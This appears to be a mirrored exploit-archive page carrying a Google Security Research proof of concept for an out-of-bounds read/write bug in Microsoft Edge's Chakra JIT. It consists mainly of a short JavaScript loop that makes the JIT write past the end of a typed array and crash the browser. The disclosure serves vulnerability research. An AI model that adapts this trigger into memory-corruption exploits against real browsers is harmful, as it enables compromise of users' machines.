Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes - 体验盒子

作者： Google Security Research

日期： 2018-07-12

类别：

平台：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

/*

It seems that this issue is similar to theissue 1429(MSRC 42111). It might need to refresh the page several times to observe a crash.

PoC:

*/

let arr = new Uint32Array(1000);

for (let i = 0; i < 0x1000000; i++) {

for (let j = 0; j < 1; j++) {

i--;

i++;

}

arr[i] = 0x1234;

}